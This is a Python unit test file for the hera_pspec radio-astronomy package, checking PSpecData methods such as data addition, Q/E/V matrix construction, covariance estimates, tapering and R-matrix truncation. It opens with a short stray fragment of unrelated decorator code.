return six.wraps(wrapped, assigned=_SAFE_VALID_ASSIGNMENTS)
else:
return six.wraps(wrapped)
|
11520429
|
import unittest
import pytest
import numpy as np
import pyuvdata as uv
import os, copy, sys
from scipy.integrate import simps, trapz
from .. import pspecdata, pspecbeam, conversions, container, utils, testing
from hera_pspec.data import DATA_PATH
from pyuvdata import UVData, UVCal, utils as uvutils
from hera_cal import redcal
from scipy.signal import windows
from scipy.interpolate import interp1d
from astropy.time import Time
import warnings
import glob
from uvtools import dspec
# Data files to use in tests
dfiles = [
'zen.2458042.12552.xx.HH.uvXAA',
'zen.2458042.12552.xx.HH.uvXAA'
]
dfiles_std = [
'zen.2458042.12552.std.xx.HH.uvXAA',
'zen.2458042.12552.std.xx.HH.uvXAA'
]
# List of tapering function to use in tests
taper_selection = ['none', 'bh7',]
#taper_selection = ['blackman', 'blackman-harris', 'gaussian0.4', 'kaiser2',
# 'kaiser3', 'hamming', 'hanning', 'parzen']
def generate_pos_def(n):
"""
Generate a random positive definite Hermitian matrix.
Parameters
----------
n : integer
Size of desired matrix
Returns
-------
A : array_like
Positive definite matrix
"""
A = np.random.normal(size=(n,n)) + 1j * np.random.normal(size=(n,n))
A += np.conjugate(A).T
# Add just enough of an identity matrix to make all eigenvalues positive
A += -1.01*np.min(np.linalg.eigvalsh(A))*np.identity(n)
return A
def generate_pos_def_all_pos(n):
"""
Generate a random positive definite symmetric matrix, with all entries
positive.
Parameters
----------
n : integer
Size of desired matrix
Returns
-------
A : array_like
Positive definite matrix
"""
A = np.random.uniform(size=(n,n))
A += A.T
# Add just enough of an identity matrix to make all eigenvalues positive
A += -1.01*np.min(np.linalg.eigvalsh(A))*np.identity(n)
return A
def diagonal_or_not(mat, places=7):
"""
Tests whether a matrix is diagonal or not.
Parameters
----------
n : array_like
Matrix to be tested
Returns
-------
diag : bool
True if matrix is diagonal
"""
mat_norm = np.linalg.norm(mat)
diag_mat_norm = np.linalg.norm(np.diag(np.diag(mat)))
diag = (round(mat_norm-diag_mat_norm, places) == 0)
return diag
class Test_PSpecData(unittest.TestCase):
def setUp(self):
# Instantiate empty PSpecData
self.ds = pspecdata.PSpecData()
# Load datafiles
self.d = []
for dfile in dfiles:
_d = uv.UVData()
_d.read_miriad(os.path.join(DATA_PATH, dfile))
self.d.append(_d)
# Load standard deviations
self.d_std = []
for dfile in dfiles_std:
_d = uv.UVData()
_d.read_miriad(os.path.join(DATA_PATH, dfile))
self.d_std.append(_d)
# Set trivial weights
self.w = [None for _d in dfiles]
# Load beam file
beamfile = os.path.join(DATA_PATH, 'HERA_NF_dipole_power.beamfits')
self.bm = pspecbeam.PSpecBeamUV(beamfile)
self.bm.filename = 'HERA_NF_dipole_power.beamfits'
#Load isotropic beam file
beamfile_Q = os.path.join(DATA_PATH, 'isotropic_beam.beamfits')
self.bm_Q = pspecbeam.PSpecBeamUV(beamfile_Q)
self.bm_Q.filename = 'isotropic_beam.beamfits'
# load another data file
self.uvd = uv.UVData()
self.uvd.read_miriad(os.path.join(DATA_PATH,
"zen.2458042.17772.xx.HH.uvXA"))
self.uvd_std = uv.UVData()
self.uvd_std.read_miriad(os.path.join(DATA_PATH,
"zen.2458042.17772.std.xx.HH.uvXA"))
def tearDown(self):
pass
def runTest(self):
pass
def test_init(self):
# Test creating empty PSpecData
ds = pspecdata.PSpecData()
# Test whether unequal no. of weights is picked up
self.assertRaises( AssertionError,
pspecdata.PSpecData,
[uv.UVData(), uv.UVData(), uv.UVData()],
[uv.UVData(), uv.UVData()] )
# Test passing data and weights of the wrong type
d_arr = np.ones((6, 8))
d_lst = [[0,1,2] for i in range(5)]
d_float = 12.
d_dict = {'(0,1)':np.arange(5), '(0,2)':np.arange(5)}
self.assertRaises(TypeError, pspecdata.PSpecData, d_arr, d_arr)
self.assertRaises(TypeError, pspecdata.PSpecData, d_lst, d_lst)
self.assertRaises(TypeError, pspecdata.PSpecData, d_float, d_float)
self.assertRaises(TypeError, pspecdata.PSpecData, d_dict, d_dict)
# Test exception when not a UVData instance
self.assertRaises(TypeError, ds.add, [1], [None])
# Test get weights when fed a UVData for weights
ds = pspecdata.PSpecData(dsets=[self.uvd, self.uvd], wgts=[self.uvd, self.uvd])
key = (0, (24, 25), 'xx')
assert np.all(np.isclose(ds.x(key), ds.w(key)))
# Test labels when adding dsets
uvd = self.uvd
ds = pspecdata.PSpecData()
assert len(ds.labels) == 0
ds.add([uvd, uvd], [None, None])
assert len(ds.labels) == 2
ds.add(uvd, None, labels='foo')
assert len(ds.dsets) == len(ds.labels) == 3
assert ds.labels == ['dset0', 'dset1', 'foo']
ds.add(uvd, None)
assert ds.labels == ['dset0', 'dset1', 'foo', 'dset3']
# Test some exceptions
ds = pspecdata.PSpecData()
pytest.raises(ValueError, ds.get_G, key, key)
pytest.raises(ValueError, ds.get_H, key, key)
def test_add_data(self):
"""
Test PSpecData add()
"""
uv = self.d[0]
# test adding non list objects
pytest.raises(TypeError, self.ds.add, 1, 1)
# test adding non UVData objects
pytest.raises(TypeError, self.ds.add, [1], None)
pytest.raises(TypeError, self.ds.add, [uv], [1])
pytest.raises(TypeError, self.ds.add, [uv], None, dsets_std=[1])
# test adding non UVCal for cals
pytest.raises(TypeError, self.ds.add, [uv], None, cals=[1])
# test TypeError if dsets is dict but other inputs are not
pytest.raises(TypeError, self.ds.add, {'d':uv}, [0])
pytest.raises(TypeError, self.ds.add, {'d':uv}, {'d':uv}, dsets_std=[0])
pytest.raises(TypeError, self.ds.add, {'d':uv}, {'d':uv}, cals=[0])
# specifying labels when dsets is a dict is a ValueError
pytest.raises(ValueError, self.ds.add, {'d':uv}, None, labels=['d'])
# use lists, but not appropriate lengths
pytest.raises(AssertionError, self.ds.add, [uv], [uv, uv])
pytest.raises(AssertionError, self.ds.add, [uv], None, dsets_std=[uv, uv])
pytest.raises(AssertionError, self.ds.add, [uv], None, cals=[None, None])
pytest.raises(AssertionError, self.ds.add, [uv], None, labels=['foo', 'bar'])
def test_set_symmetric_taper(self):
"""
Make sure that you can't set a symmtric taper with an truncated R matrix
"""
self.ds = pspecdata.PSpecData(dsets=self.d, wgts=self.w)
Nfreq = self.ds.spw_Nfreqs
Ntime = self.ds.Ntimes
Ndlys = Nfreq - 3
self.ds.spw_Ndlys = Ndlys
# Set baselines to use for tests
key1 = (0, 24, 38)
key2 = (1, 25, 38)
key3 = [(0, 24, 38), (0, 24, 38)]
key4 = [(1, 25, 38), (1, 25, 38)]
rpk1 = {'filter_centers':[0.],'filter_half_widths':[100e-9],'filter_factors':[1e-9]}
rpk2 = {'filter_centers':[0.],'filter_half_widths':[100e-9],'filter_factors':[1e-9]}
self.ds.set_weighting('dayenu')
self.ds.set_r_param(key1,rpk1)
self.ds.set_r_param(key2,rpk2)
ds1 = copy.deepcopy(self.ds)
ds1.set_spw((10,Nfreq-10))
ds1.set_symmetric_taper(False)
ds1.set_filter_extension([10,10])
ds1.set_filter_extension((10,10))
rm1 = self.ds.R(key1)
self.ds.set_symmetric_taper(True)
pytest.raises(ValueError, ds1.set_symmetric_taper, True)
#now make sure warnings are raised when we extend filter with
#symmetric tapering and that symmetric taper is set to false.
with warnings.catch_warnings(record=True) as w:
self.ds.set_filter_extension((10,10))
assert len(w) > 0
self.assertTrue(not(self.ds.symmetric_taper))
"""
Now directly compare results to expectations.
"""
self.ds = pspecdata.PSpecData(dsets=self.d, wgts=self.w)
Nfreq = self.ds.spw_Nfreqs
Ntime = self.ds.Ntimes
Ndlys = Nfreq - 3
self.ds.spw_Ndlys = Ndlys
key1 = (0, 24, 38)
key2 = (1,25, 38)
rpk1 = {'filter_centers':[0.],'filter_half_widths':[100e-9],'filter_factors':[1e-9]}
self.ds.set_weighting('dayenu')
self.ds.set_taper('bh7')
self.ds.set_r_param(key1,rpk1)
#get the symmetric tapering
rmat_symmetric = self.ds.R(key1)
#now set taper to be asymmetric
self.ds.set_symmetric_taper(False)
rmat_a = self.ds.R(key1)
#check against independent solution
bh_taper = np.sqrt(dspec.gen_window('bh7', Nfreq).reshape(1,-1))
rmat = dspec.dayenu_mat_inv(x=self.ds.freqs[self.ds.spw_range[0]:self.ds.spw_range[1]],
filter_centers=[0.], filter_half_widths=[100e-9], filter_factors=[1e-9])
wmat = np.outer(np.diag(np.sqrt(self.ds.Y(key1))), np.diag(np.sqrt(self.ds.Y(key1))))
rmat = np.linalg.pinv(wmat * rmat)
self.assertTrue(np.all(np.isclose(rmat_symmetric, bh_taper.T * rmat * bh_taper,atol=1e-6)))
self.assertTrue(np.all(np.isclose(rmat_a, bh_taper.T ** 2. * rmat,atol=1e-6)))
self.assertTrue(not np.all(np.isclose(rmat_symmetric, rmat_a,atol=1e-6)))
def test_labels(self):
"""
Test that dataset labels work.
"""
# Check that specifying labels does work
psd = pspecdata.PSpecData( dsets=[self.d[0], self.d[1],],
wgts=[self.w[0], self.w[1], ],
labels=['red', 'blue'])
np.testing.assert_array_equal( psd.x(('red', 24, 38)),
psd.x((0, 24, 38)) )
# Check specifying labels using dicts
dsdict = {'a':self.d[0], 'b':self.d[1]}
psd = pspecdata.PSpecData(dsets=dsdict, wgts=dsdict)
pytest.raises(ValueError, pspecdata.PSpecData, dsets=dsdict,
wgts=dsdict, labels=['a', 'b'])
# Check that invalid labels raise errors
pytest.raises(KeyError, psd.x, ('green', 24, 38))
def test_parse_blkey(self):
# make a double-pol UVData
uvd = copy.deepcopy(self.uvd)
uvd.polarization_array[0] = -7
uvd = uvd + self.uvd
# check parse_blkey
ds = pspecdata.PSpecData(dsets=[uvd, uvd], wgts=[None, None], labels=['red', 'blue'])
dset, bl = ds.parse_blkey((0, (24, 25)))
assert dset == 0
assert bl == (24, 25)
dset, bl = ds.parse_blkey(('red', (24, 25), 'xx'))
assert dset == 0
assert bl == (24, 25, 'xx')
# check PSpecData.x works
assert ds.x(('red', (24, 25))).shape == (2, 64, 60)
assert ds.x(('red', (24, 25), 'xx')).shape == (64, 60)
assert ds.w(('red', (24, 25))).shape == (2, 64, 60)
assert ds.w(('red', (24, 25), 'xx')).shape == (64, 60)
def test_str(self):
"""
Check that strings can be output.
"""
ds = pspecdata.PSpecData()
print(ds) # print empty psd
ds.add(self.uvd, None)
print(ds) # print populated psd
def test_get_Q_alt(self):
"""
Test the Q = dC/dp function.
"""
vect_length = 50
x_vect = np.random.normal(size=vect_length) \
+ 1.j * np.random.normal(size=vect_length)
y_vect = np.random.normal(size=vect_length) \
+ 1.j * np.random.normal(size=vect_length)
self.ds.spw_Nfreqs = vect_length
for i in range(vect_length):
Q_matrix = self.ds.get_Q_alt(i)
# Test that if the number of delay bins hasn't been set
# the code defaults to putting that equal to Nfreqs
self.assertEqual(self.ds.spw_Ndlys, self.ds.spw_Nfreqs)
xQy = np.dot(np.conjugate(x_vect), np.dot(Q_matrix, y_vect))
yQx = np.dot(np.conjugate(y_vect), np.dot(Q_matrix, x_vect))
xQx = np.dot(np.conjugate(x_vect), np.dot(Q_matrix, x_vect))
# Test that Q matrix has the right shape
self.assertEqual(Q_matrix.shape, (vect_length, vect_length))
# Test that x^t Q y == conj(y^t Q x)
self.assertAlmostEqual(xQy, np.conjugate(yQx))
# x^t Q x should be real
self.assertAlmostEqual(np.imag(xQx), 0.)
x_vect = np.ones(vect_length)
Q_matrix = self.ds.get_Q_alt(vect_length//2)
xQx = np.dot(np.conjugate(x_vect), np.dot(Q_matrix, x_vect))
self.assertAlmostEqual(xQx, np.abs(vect_length**2.))
# Sending in sinusoids for x and y should give delta functions
# Now do all the same tests from above but for a different number
# of delay channels
self.ds.set_Ndlys(vect_length-3)
for i in range(vect_length-3):
Q_matrix = self.ds.get_Q_alt(i)
xQy = np.dot(np.conjugate(x_vect), np.dot(Q_matrix, y_vect))
yQx = np.dot(np.conjugate(y_vect), np.dot(Q_matrix, x_vect))
xQx = np.dot(np.conjugate(x_vect), np.dot(Q_matrix, x_vect))
# Test that Q matrix has the right shape
self.assertEqual(Q_matrix.shape, (vect_length, vect_length))
# Test that x^t Q y == conj(y^t Q x)
self.assertAlmostEqual(xQy, np.conjugate(yQx))
# x^t Q x should be real
self.assertAlmostEqual(np.imag(xQx), 0.)
x_vect = np.ones(vect_length)
Q_matrix = self.ds.get_Q_alt((vect_length-2)//2-1)
xQx = np.dot(np.conjugate(x_vect), np.dot(Q_matrix, x_vect))
self.assertAlmostEqual(xQx, np.abs(vect_length**2.))
# Sending in sinusoids for x and y should give delta functions
# Make sure that error is raised when asking for a delay mode outside
# of the range of delay bins
pytest.raises(IndexError, self.ds.get_Q_alt, vect_length-1)
# Ensure that in the special case where the number of channels equals
# the number of delay bins, the FFT method gives the same answer as
# the explicit construction method
multiplicative_tolerance = 0.001
self.ds.set_Ndlys(vect_length)
for alpha in range(vect_length):
Q_matrix_fft = self.ds.get_Q_alt(alpha)
Q_matrix = self.ds.get_Q_alt(alpha, allow_fft=False)
Q_diff_norm = np.linalg.norm(Q_matrix - Q_matrix_fft)
self.assertLessEqual(Q_diff_norm, multiplicative_tolerance)
# Check for error handling
pytest.raises(ValueError, self.ds.set_Ndlys, vect_length+100)
def test_get_Q(self):
"""
Test the Q = dC_ij/dp function.
A general comment here:
I would really want to do away with try and exception statements. The reason to use them now
was that current unittests throw in empty datasets to these functions. Given that we are computing
the actual value of tau/freq/taper etc. we do need datasets! Currently, if there is no dataset,
Q_matrix is simply an identity matrix with same dimensions as that of vector length.
It will be very helpful if we can have more elegant solution for this.
"""
vect_length = 50
x_vect = np.random.normal(size=vect_length) \
+ 1.j * np.random.normal(size=vect_length)
y_vect = np.random.normal(size=vect_length) \
+ 1.j * np.random.normal(size=vect_length)
self.ds.spw_Nfreqs = vect_length
#Test if there is a warning if user does not pass the beam
key1 = (0, 24, 38)
key2 = (1, 24, 38)
uvd = copy.deepcopy(self.uvd)
ds_t = pspecdata.PSpecData(dsets=[uvd, uvd])
for i in range(vect_length):
try:
Q_matrix = self.ds.get_Q(i)
# Test that if the number of delay bins hasn't been set
# the code defaults to putting that equal to Nfreqs
self.assertEqual(self.ds.spw_Ndlys, self.ds.spw_Nfreqs)
except IndexError:
Q_matrix = np.ones((vect_length, vect_length))
xQy = np.dot(np.conjugate(x_vect), np.dot(Q_matrix, y_vect))
yQx = np.dot(np.conjugate(y_vect), np.dot(Q_matrix, x_vect))
xQx = np.dot(np.conjugate(x_vect), np.dot(Q_matrix, x_vect))
# Test that Q matrix has the right shape
self.assertEqual(Q_matrix.shape, (vect_length, vect_length))
# Test that x^t Q y == conj(y^t Q x)
self.assertAlmostEqual(xQy, np.conjugate(yQx))
# x^t Q x should be real
self.assertAlmostEqual(np.imag(xQx), 0.)
x_vect = np.ones(vect_length)
try:
Q_matrix = self.ds.get_Q(vect_length/2)
except IndexError:
Q_matrix = np.ones((vect_length, vect_length))
xQx = np.dot(np.conjugate(x_vect), np.dot(Q_matrix, x_vect))
self.assertAlmostEqual(xQx, np.abs(vect_length**2.))
# Now do all the same tests from above but for a different number
# of delay channels
self.ds.set_Ndlys(vect_length-3)
for i in range(vect_length-3):
try:
Q_matrix = self.ds.get_Q(i)
except IndexError:
Q_matrix = np.ones((vect_length,vect_length))
xQy = np.dot(np.conjugate(x_vect), np.dot(Q_matrix, y_vect))
yQx = np.dot(np.conjugate(y_vect), np.dot(Q_matrix, x_vect))
xQx = np.dot(np.conjugate(x_vect), np.dot(Q_matrix, x_vect))
# Test that Q matrix has the right shape
self.assertEqual(Q_matrix.shape, (vect_length, vect_length))
# Test that x^t Q y == conj(y^t Q x)
self.assertAlmostEqual(xQy, np.conjugate(yQx))
# x^t Q x should be real
self.assertAlmostEqual(np.imag(xQx), 0.)
x_vect = np.ones(vect_length)
try:
Q_matrix = self.ds.get_Q((vect_length-2)/2-1)
except IndexError:
Q_matrix = np.ones((vect_length,vect_length))
xQx = np.dot(np.conjugate(x_vect), np.dot(Q_matrix, x_vect))
self.assertAlmostEqual(xQx, np.abs(vect_length**2.))
# Make sure that error is raised when asking for a delay mode outside
# of the range of delay bins
pytest.raises(IndexError, self.ds.get_Q, vect_length-1)
def test_get_integral_beam(self):
"""
Test the integral of the beam and tapering function in Q.
"""
pol = 'xx'
#Test if there is a warning if user does not pass the beam
uvd = copy.deepcopy(self.uvd)
ds_t = pspecdata.PSpecData(dsets=[uvd, uvd])
ds = pspecdata.PSpecData(dsets=[uvd, uvd], beam=self.bm)
with warnings.catch_warnings(record=True) as w:
ds_t.get_integral_beam(pol)
assert len(w) > 0
try:
integral_matrix = ds.get_integral_beam(pol)
# Test that if the number of delay bins hasn't been set
# the code defaults to putting that equal to Nfreqs
self.assertEqual(ds.spw_Ndlys, ds.spw_Nfreqs)
except IndexError:
integral_matrix = np.ones((ds.spw_Ndlys, ds.spw_Ndlys))
# Test that integral matrix has the right shape
self.assertEqual(integral_matrix.shape, (ds.spw_Nfreqs, ds.spw_Nfreqs))
def test_get_unnormed_E(self):
"""
Test the E function
"""
# Test that error is raised if spw_Ndlys is not set
uvd = copy.deepcopy(self.uvd)
ds = pspecdata.PSpecData(dsets=[uvd, uvd], wgts=[None, None], labels=['red', 'blue'])
ds.spw_Ndlys = None
pytest.raises(ValueError, ds.get_unnormed_E, 'placeholder', 'placeholder')
# Test that if R1 = R2, then the result is Hermitian
ds.spw_Ndlys = 7
random_R = generate_pos_def_all_pos(ds.spw_Nfreqs)
wgt_matrix_dict = {} # The keys here have no significance except they are formatted right
wgt_matrix_dict[('red', (24, 25))] = random_R
wgt_matrix_dict[('blue', (24, 25))] = random_R
ds.set_R(wgt_matrix_dict)
E_matrices = ds.get_unnormed_E(('red', (24, 25)), ('blue', (24, 25)))
multiplicative_tolerance = 0.0000001
for matrix in E_matrices:
diff_norm = np.linalg.norm(matrix.T.conj() - matrix)
self.assertLessEqual(diff_norm, multiplicative_tolerance)
#Test for the correct shape when exact_norm is True
ds_c = pspecdata.PSpecData(dsets=[uvd, uvd], wgts=[None, None], labels=['red', 'blue'], beam=self.bm)
ds_c.spw_Ndlys = 10
random_R = generate_pos_def_all_pos(ds_c.spw_Nfreqs)
wgt_matrix_dict = {}
wgt_matrix_dict[('red', (24, 25))] = random_R
wgt_matrix_dict[('blue', (24, 25))] = random_R
ds_c.set_R(wgt_matrix_dict)
E_matrices = ds_c.get_unnormed_E(('red', (24, 25)), ('blue', (24, 25)), exact_norm=True, pol='xx')
self.assertEqual(E_matrices.shape, (ds_c.spw_Ndlys, ds_c.spw_Nfreqs, ds_c.spw_Nfreqs))
# Test that if R1 != R2, then i) E^{12,dagger} = E^{21}
random_R2 = generate_pos_def_all_pos(ds.spw_Nfreqs)
wgt_matrix_dict = {}
wgt_matrix_dict[('red', (24, 25))] = random_R
wgt_matrix_dict[('blue', (24, 25))] = random_R2
ds.set_R(wgt_matrix_dict)
E12_matrices = ds.get_unnormed_E(('red', (24, 25)), ('blue', (24, 25)))
E21_matrices = ds.get_unnormed_E(('blue', (24, 25)), ('red', (24, 25)))
multiplicative_tolerance = 0.0000001
for mat12,mat21 in zip(E12_matrices,E21_matrices):
diff_norm = np.linalg.norm(mat12.T.conj() - mat21)
self.assertLessEqual(diff_norm, multiplicative_tolerance)
# Test that if there is only one delay bin and R1 = R2 = I, then
# the E matrices are all 0.5s exept in flagged channels.
ds.spw_Ndlys = 1
wgt_matrix_dict = {}
wgt_matrix_dict[('red', (24, 25))] = np.eye(ds.spw_Nfreqs)
wgt_matrix_dict[('blue', (24, 25))] = np.eye(ds.spw_Nfreqs)
flags1 = np.diag(ds.Y(('red', (24, 25))))
flags2 = np.diag(ds.Y(('blue', (24, 25))))
ds.set_R(wgt_matrix_dict)
E_matrices = ds.get_unnormed_E(('red', (24, 25)), ('blue', (24, 25)))
multiplicative_tolerance = 0.0000001
for matrix in E_matrices:
for i in range(ds.spw_Nfreqs):
for j in range(ds.spw_Nfreqs):
if flags1[i] * flags2[j] == 0: # either channel flagged
self.assertAlmostEqual(matrix[i,j], 0.)
else:
self.assertAlmostEqual(matrix[i,j], 0.5)
def test_cross_covar_model(self):
uvd = copy.deepcopy(self.uvd)
ds = pspecdata.PSpecData(dsets=[uvd, uvd], wgts=[None, None], labels=['red', 'blue'])
key1 = ('red', (24, 25), 'xx')
key2 = ('blue', (25, 38), 'xx')
pytest.raises(ValueError, ds.cross_covar_model, key1, key2, model='other_string')
pytest.raises(AssertionError, ds.cross_covar_model, key1, 'a_string')
conj1_conj1 = ds.cross_covar_model(key1, key1, conj_1=True, conj_2=True)
conj1_real1 = ds.cross_covar_model(key1, key1, conj_1=True, conj_2=False)
real1_conj1 = ds.cross_covar_model(key1, key1, conj_1=False, conj_2=True)
real1_real1 = ds.cross_covar_model(key1, key1, conj_1=False, conj_2=False)
# Check matrix sizes
for matrix in [conj1_conj1, conj1_real1, real1_conj1, real1_real1]:
self.assertEqual(matrix.shape, (ds.spw_Nfreqs, ds.spw_Nfreqs))
for j in range(ds.spw_Nfreqs):
for k in range(ds.spw_Nfreqs):
# Check that the matrices that ought to be Hermitian are indeed Hermitian
self.assertAlmostEqual(conj1_real1.conj()[k,j], conj1_real1[j,k])
self.assertAlmostEqual(real1_conj1.conj()[k,j], real1_conj1[j,k])
# Check that real_real and conj_conj are complex conjugates of each other
# Also check that they are symmetric
self.assertAlmostEqual(real1_real1.conj()[j,k], conj1_conj1[j,k])
self.assertAlmostEqual(real1_real1[k,j], real1_real1[j,k])
self.assertAlmostEqual(conj1_conj1[k,j], conj1_conj1[j,k])
real1_real2 = ds.cross_covar_model(key1, key2, conj_1=False, conj_2=False)
real2_real1 = ds.cross_covar_model(key2, key1, conj_1=False, conj_2=False)
conj1_conj2 = ds.cross_covar_model(key1, key2, conj_1=True, conj_2=True)
conj2_conj1 = ds.cross_covar_model(key2, key1, conj_1=True, conj_2=True)
conj1_real2 = ds.cross_covar_model(key1, key2, conj_1=True, conj_2=False)
conj2_real1 = ds.cross_covar_model(key2, key1, conj_1=True, conj_2=False)
real1_conj2 = ds.cross_covar_model(key1, key2, conj_1=False, conj_2=True)
real2_conj1 = ds.cross_covar_model(key2, key1, conj_1=False, conj_2=True)
# And some similar tests for cross covariances
for j in range(ds.spw_Nfreqs):
for k in range(ds.spw_Nfreqs):
self.assertAlmostEqual(real1_real2[k,j], real2_real1[j,k])
self.assertAlmostEqual(conj1_conj2[k,j], conj2_conj1[j,k])
self.assertAlmostEqual(conj1_real2.conj()[k,j], conj2_real1[j,k])
self.assertAlmostEqual(real1_conj2.conj()[k,j], real2_conj1[j,k])
def test_get_unnormed_V(self):
self.ds = pspecdata.PSpecData(dsets=self.d, wgts=self.w, labels=['red', 'blue'])
key1 = ('red', (24, 25), 'xx')
key2 = ('blue', (25, 38), 'xx')
self.ds.spw_Ndlys = 5
V = self.ds.get_unnormed_V(key1, key2)
# Check size
self.assertEqual(V.shape, (self.ds.spw_Ndlys,self.ds.spw_Ndlys))
# Test hermiticity. Generally this is only good to about 1 part in 10^15.
# If this is an issue downstream, should investigate more in the future.
tol = 1e-10
frac_non_herm = abs(V.conj().T - V)/abs(V)
for i in range(self.ds.spw_Ndlys):
for j in range(self.ds.spw_Ndlys):
self.assertLessEqual(frac_non_herm[i,j], tol)
def test_get_MW(self):
n = 17
random_G = generate_pos_def_all_pos(n)
random_H = generate_pos_def_all_pos(n)
random_V = generate_pos_def_all_pos(n)
pytest.raises(AssertionError, self.ds.get_MW, random_G, random_H, mode='L^3')
pytest.raises(NotImplementedError, self.ds.get_MW, random_G, random_H, mode='H^-1', exact_norm=True)
for mode in ['H^-1', 'V^-1/2', 'I', 'L^-1']:
if mode == 'H^-1':
# Test that if we have full-rank matrices, the resulting window functions
# are indeed delta functions
M, W = self.ds.get_MW(random_G, random_H, mode=mode)
Hinv = np.linalg.inv(random_H)
for i in range(n):
self.assertAlmostEqual(W[i,i], 1.)
for j in range(n):
self.assertAlmostEqual(M[i,j], Hinv[i,j])
# When the matrices are not full rank, test that the window functions
# are at least properly normalized.
deficient_H = np.ones((3,3))
M, W = self.ds.get_MW(deficient_H, deficient_H, mode=mode)
norm = np.sum(W, axis=1)
for i in range(3):
self.assertAlmostEqual(norm[i], 1.)
# Check that the method ignores G
M, W = self.ds.get_MW(random_G, random_H, mode=mode)
M_other, W_other = self.ds.get_MW(random_H, random_H, mode=mode)
for i in range(n):
for j in range(n):
self.assertAlmostEqual(M[i,j], M_other[i,j])
self.assertAlmostEqual(W[i,j], W_other[i,j])
elif mode == 'V^-1/2':
# Test that we are checking for the presence of a covariance matrix
pytest.raises(ValueError, self.ds.get_MW, random_G, random_H, mode=mode)
# Test that the error covariance is diagonal
M, W = self.ds.get_MW(random_G, random_H, mode=mode, band_covar=random_V)
band_covar = np.dot(M, np.dot(random_V, M.T))
self.assertEqual(diagonal_or_not(band_covar), True)
elif mode == 'I':
# Test that the norm matrix is diagonal
M, W = self.ds.get_MW(random_G, random_H, mode=mode)
self.assertEqual(diagonal_or_not(M), True)
elif mode == 'L^-1':
# Test that Cholesky mode is disabled
pytest.raises(NotImplementedError,
self.ds.get_MW, random_G, random_H, mode=mode)
# Test sizes for everyone
self.assertEqual(M.shape, (n,n))
self.assertEqual(W.shape, (n,n))
# Window function matrices should have each row sum to unity
# regardless of the mode chosen
test_norm = np.sum(W, axis=1)
for norm in test_norm:
self.assertAlmostEqual(norm, 1.)
def test_cov_q(self, ndlys=13):
"""
Test that q_hat_cov has the right shape and accepts keys in correct
format. Also validate with arbitrary number of delays.
"""
for d in self.d:
d.flag_array[:] = False #ensure that there are no flags!
d.select(times=np.unique(d.time_array)[:10], frequencies=d.freq_array[0, :16])
for d_std in self.d_std:
d_std.flag_array[:] = False
d_std.select(times=np.unique(d_std.time_array)[:10], frequencies=d_std.freq_array[0, :16])
self.ds = pspecdata.PSpecData(dsets=self.d, wgts=self.w, dsets_std=self.d_std)
self.ds = pspecdata.PSpecData(dsets=self.d, wgts=self.w, dsets_std=self.d_std)
Ntime = self.ds.Ntimes
self.ds.set_Ndlys(ndlys)
# Here is the analytic covariance matrix...
chan_x, chan_y = np.meshgrid(range(self.ds.Nfreqs), range(self.ds.Nfreqs))
cov_analytic = np.zeros((self.ds.spw_Ndlys, self.ds.spw_Ndlys), dtype=np.complex128)
for alpha in range(self.ds.spw_Ndlys):
for beta in range(self.ds.spw_Ndlys):
cov_analytic[alpha, beta] = np.exp(-2j*np.pi*(alpha-beta)*(chan_x-chan_y)/self.ds.spw_Ndlys).sum()
key1 = (0, 24, 38)
key2 = (1, 25, 38)
#print(cov_analytic)
for input_data_weight in ['identity','iC', 'dayenu']:
self.ds.set_weighting(input_data_weight)
#check error raised
if input_data_weight == 'dayenu':
pytest.raises(ValueError,self.ds.R, key1)
rpk = {'filter_centers':[0.],'filter_half_widths':[0.],'filter_factors':[0.]}
self.ds.set_r_param(key1,rpk)
self.ds.set_r_param(key2,rpk)
for taper in taper_selection:
qc = self.ds.cov_q_hat(key1,key2,model='dsets')
self.assertTrue(np.allclose(np.array(list(qc.shape)),
np.array([self.ds.Ntimes, self.ds.spw_Ndlys, self.ds.spw_Ndlys]), atol=1e-6))
qc = self.ds.cov_q_hat(key1,key2,model='empirical')
self.assertTrue(np.allclose(np.array(list(qc.shape)),
np.array([self.ds.Ntimes, self.ds.spw_Ndlys, self.ds.spw_Ndlys]), atol=1e-6))
"""
Now test that analytic Error calculation gives Nchan^2
"""
self.ds.set_weighting('identity')
qc = self.ds.cov_q_hat(key1, key2, model='dsets')
self.assertTrue(np.allclose(qc,
np.repeat(cov_analytic[np.newaxis, :, :], self.ds.Ntimes, axis=0), atol=1e-6))
"""
Test lists of keys
"""
self.ds.set_weighting('identity')
qc=self.ds.cov_q_hat([key1], [key2], time_indices=[0], model='dsets')
self.assertTrue(np.allclose(qc,
np.repeat(cov_analytic[np.newaxis, :, :], self.ds.Ntimes, axis=0), atol=1e-6))
self.assertRaises(ValueError, self.ds.cov_q_hat, key1, key2, time_indices=200)
self.assertRaises(ValueError, self.ds.cov_q_hat, key1, key2, time_indices="watch out!")
def test_cov_p_hat(self):
"""
Test cov_p_hat, verify on identity.
"""
self.ds = pspecdata.PSpecData(dsets=self.d, wgts=self.w, dsets_std=self.d_std)
cov_p = self.ds.cov_p_hat(np.sqrt(6.)*np.identity(10),np.array([5.*np.identity(10)]))
for p in range(10):
for q in range(10):
if p == q:
self.assertTrue(np.isclose(30., cov_p[0, p, q], atol=1e-6))
else:
self.assertTrue(np.isclose(0., cov_p[0, p, q], atol=1e-6))
def test_R_truncation(self):
"""
Test truncation of R-matrices. These should give a q_hat that is all
zeros outside of the with f-start and f-end.
"""
self.ds = pspecdata.PSpecData(dsets=self.d, wgts=self.w)
Nfreq = self.ds.spw_Nfreqs
Ntime = self.ds.Ntimes
Ndlys = Nfreq - 3
self.ds.spw_Ndlys = Ndlys
# Set baselines to use for tests
key1 = (0, 24, 38)
key2 = (1, 25, 38)
key3 = [(0, 24, 38), (0, 24, 38)]
key4 = [(1, 25, 38), (1, 25, 38)]
rpk1 = {'filter_centers':[0.],'filter_half_widths':[100e-9],'filter_factors':[1e-9]}
rpk2 = {'filter_centers':[0.],'filter_half_widths':[100e-9],'filter_factors':[1e-9]}
self.ds.set_weighting('dayenu')
self.ds.set_r_param(key1,rpk1)
self.ds.set_r_param(key2,rpk2)
ds1 = copy.deepcopy(self.ds)
ds1.set_spw((10,Nfreq-10))
ds1.set_symmetric_taper(False)
ds1.set_filter_extension([10,10])
ds1.set_filter_extension((10,10))
rm1 = self.ds.R(key1)
rm2 = ds1.R(key2)
rm3 = ds1.R(key1)
self.assertTrue(np.shape(rm2) == (ds1.spw_Nfreqs, self.ds.spw_Nfreqs))
#check that all values that are not truncated match values of untrancated matrix.
self.assertTrue(np.all(np.isclose(rm1[10:-10], rm2, atol=1e-6)))
